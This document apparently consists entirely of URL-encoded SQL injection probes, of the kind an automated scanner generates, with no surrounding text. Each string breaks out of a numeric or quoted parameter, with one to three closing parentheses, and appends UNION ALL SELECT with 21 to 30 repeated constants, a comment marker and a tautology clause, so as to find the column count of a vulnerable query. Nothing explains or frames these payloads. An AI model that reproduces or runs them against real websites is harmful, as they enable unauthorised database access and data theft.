-6602%22%20UNION%20ALL%20SELECT%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%2C%205773%23 -2354%22%20UNION%20ALL%20SELECT%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%2C%204850%23 -3759%22%20UNION%20ALL%20SELECT%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%2C%201381%23 -3250%22%20UNION%20ALL%20SELECT%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%23 -5589%22%20UNION%20ALL%20SELECT%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%23 -4047%22%20UNION%20ALL%20SELECT%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%2C%204395%23 -9506%29%20UNION%20ALL%20SELECT%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%23%20AND%20%283621%3D3621 -9507%29%20UNION%20ALL%20SELECT%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%2C%209591%23%20AND%20%289620%3D9620 -6919%29%20UNION%20ALL%20SELECT%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%2C%204143%23%20AND%20%286881%3D6881 -8869%29%20UNION%20ALL%20SELECT%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%2C%201299%23%20AND%20%288652%3D8652 -9564%29%20UNION%20ALL%20SELECT%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%23%20AND%20%287429%3D7429 -2880%29%20UNION%20ALL%20SELECT%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%23%20AND%20%282250%3D2250 -3127%29%20UNION%20ALL%20SELECT%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%2C%203981%23%20AND%20%286829%3D6829 -6896%29%20UNION%20ALL%20SELECT%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%2C%203868%23%20AND%20%285625%3D5625 -8789%29%20UNION%20ALL%20SELECT%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%23%20AND%20%287745%3D7745 -8769%29%20UNION%20ALL%20SELECT%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%2C%203285%23%20AND%20%282269%3D2269 -6225%29%29%20UNION%20ALL%20SELECT%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%23%20AND%20%28%289862%3D9862 -8154%29%29%20UNION%20ALL%20SELECT%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%23%20AND%20%28%285669%3D5669 -5290%29%29%20UNION%20ALL%20SELECT%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%2C%208830%23%20AND%20%28%281190%3D1190 -1494%29%29%20UNION%20ALL%20SELECT%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%2C%204456%23%20AND%20%28%289177%3D9177 -3595%29%29%20UNION%20ALL%20SELECT%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%2C%202867%23%20AND%20%28%289631%3D9631 -8349%29%29%20UNION%20ALL%20SELECT%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%2C%201793%23%20AND%20%28%288323%3D8323 -9041%29%29%20UNION%20ALL%20SELECT%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%2C%203337%23%20AND%20%28%286713%3D6713 -7404%29%29%20UNION%20ALL%20SELECT%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%23%20AND%20%28%288615%3D8615 -3818%29%29%20UNION%20ALL%20SELECT%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%23%20AND%20%28%282379%3D2379 -6248%29%29%20UNION%20ALL%20SELECT%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%23%20AND%20%28%285115%3D5115 -1404%29%29%29%20UNION%20ALL%20SELECT%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%23%20AND%20%28%28%283421%3D3421 -5598%29%29%29%20UNION%20ALL%20SELECT%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%23%20AND%20%28%28%286573%3D6573 -1272%29%29%29%20UNION%20ALL%20SELECT%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%2C%208040%23%20AND%20%28%28%283414%3D3414 -1789%29%29%29%20UNION%20ALL%20SELECT%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%23%20AND%20%28%28%286836%3D6836 -6947%29%29%29%20UNION%20ALL%20SELECT%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%2C%204376%23%20AND%20%28%28%287940%3D7940 -6737%29%29%29%20UNION%20ALL%20SELECT%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%23%20AND%20%28%28%286267%3D6267 -9556%29%29%29%20UNION%20ALL%20SELECT%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%23%20AND%20%28%28%287187%3D7187 -4266%29%29%29%20UNION%20ALL%20SELECT%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%23%20AND%20%28%28%288818%3D8818 -5583%29%29%29%20UNION%20ALL%20SELECT%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%2C%208547%23%20AND%20%28%28%283309%3D3309 -8359%29%29%29%20UNION%20ALL%20SELECT%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%23%20AND%20%28%28%289726%3D9726 -8156%20UNION%20ALL%20SELECT%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%2C%209077%23 -5692%20UNION%20ALL%20SELECT%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%2C%203864%23 -1302%20UNION%20ALL%20SELECT%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%23 -3689%20UNION%20ALL%20SELECT%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%2C%204528%23 -7086%20UNION%20ALL%20SELECT%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%2C%206218%23 -3991%20UNION%20ALL%20SELECT%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%23 -4317%20UNION%20ALL%20SELECT%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%23 -5061%20UNION%20ALL%20SELECT%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%23 -6656%20UNION%20ALL%20SELECT%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%2C%203624%23 -2961%20UNION%20ALL%20SELECT%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%23 -6760%27%29%20UNION%20ALL%20SELECT%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%2C%208267%23%20AND%20%28%27szKj%27%3D%27szKj -7869%27%29%20UNION%20ALL%20SELECT%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%23%20AND%20%28%27nVCM%27%3D%27nVCM -1498%27%29%20UNION%20ALL%20SELECT%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%2C%202137%23%20AND%20%28%27WZsz%27%3D%27WZsz -8474%27%29%20UNION%20ALL%20SELECT%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%2C%206807%23%20AND%20%28%27gJmz%27%3D%27gJmz -4405%27%29%20UNION%20ALL%20SELECT%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870%23%20AND%20%28%27bTQl%27%3D%27bTQl -6953%27%29%20UNION%20ALL%20SELECT%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%23%20AND%20%28%27PkTk%27%3D%27PkTk -3195%27%29%20UNION%20ALL%20SELECT%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%23%20AND%20%28%27KGtf%27%3D%27KGtf -4022%27%29%20UNION%20ALL%20SELECT%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%2C%201941%23%20AND%20%28%27nEei%27%3D%27nEei -5253%27%29%20UNION%20ALL%20SELECT%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%23%20AND%20%28%27aWej%27%3D%27aWej -4380%27%29%20UNION%20ALL%20SELECT%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%23%20AND%20%28%27VgxB%27%3D%27VgxB -1748%27%29%29%20UNION%20ALL%20SELECT%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%2C%203174%23%20AND%20%28%28%27IUrb%27%3D%27IUrb -2494%27%29%29%20UNION%20ALL%20SELECT%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%2C%206831%23%20AND%20%28%28%27QaxT%27%3D%27QaxT -8717%27%29%29%20UNION%20ALL%20SELECT%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%23%20AND%20%28%28%27bpia%27%3D%27bpia -7279%27%29%29%20UNION%20ALL%20SELECT%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%23%20AND%20%28%28%27hxCw%27%3D%27hxCw -7502%27%29%29%20UNION%20ALL%20SELECT%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%2C%206273%23%20AND%20%28%28%27BjpU%27%3D%27BjpU -7716%27%29%29%20UNION%20ALL%20SELECT%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%23%20AND%20%28%28%27hDCw%27%3D%27hDCw -2740%27%29%29%20UNION%20ALL%20SELECT%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%23%20AND%20%28%28%27xmoe%27%3D%27xmoe -5194%27%29%29%20UNION%20ALL%20SELECT%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%2C%207119%23%20AND%20%28%28%27GTUT%27%3D%27GTUT -9785%27%29%29%20UNION%20ALL%20SELECT%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%2C%209574%23%20AND%20%28%28%27FOyZ%27%3D%27FOyZ -1793%27%29%29%20UNION%20ALL%20SELECT%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%2C%204458%23%20AND%20%28%28%27JoQN%27%3D%27JoQN -8839%27%29%29%29%20UNION%20ALL%20SELECT%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%2C%201638%23%20AND%20%28%28%28%27TmIe%27%3D%27TmIe -3463%27%29%29%29%20UNION%20ALL%20SELECT%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%2C%207096%23%20AND%20%28%28%28%27UZPU%27%3D%27UZPU -4176%27%29%29%29%20UNION%20ALL%20SELECT%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%2C%201182%23%20AND%20%28%28%28%27xKdZ%27%3D%27xKdZ -8639%27%29%29%29%20UNION%20ALL%20SELECT%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%2C%208759%23%20AND%20%28%28%28%27RjzL%27%3D%27RjzL -5022%27%29%29%29%20UNION%20ALL%20SELECT%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%23%20AND%20%28%28%28%27rqIz%27%3D%27rqIz -2717%27%29%29%29%20UNION%20ALL%20SELECT%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%23%20AND%20%28%28%28%27QOZe%27%3D%27QOZe -4623%27%29%29%29%20UNION%20ALL%20SELECT%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%2C%206868%23%20AND%20%28%28%28%27bIXt%27%3D%27bIXt -4776%27%29%29%29%20UNION%20ALL%20SELECT%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%23%20AND%20%28%28%28%27eYwA%27%3D%27eYwA -5645%27%29%29%29%20UNION%20ALL%20SELECT%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%2C%205683%23%20AND%20%28%28%28%27jzAY%27%3D%27jzAY -5200%27%29%29%29%20UNION%20ALL%20SELECT%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%2C%202958%23%20AND%20%28%28%28%27TmwH%27%3D%27TmwH -9221%27%20UNION%20ALL%20SELECT%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%23%20AND%20%27qZFh%27%3D%27qZFh 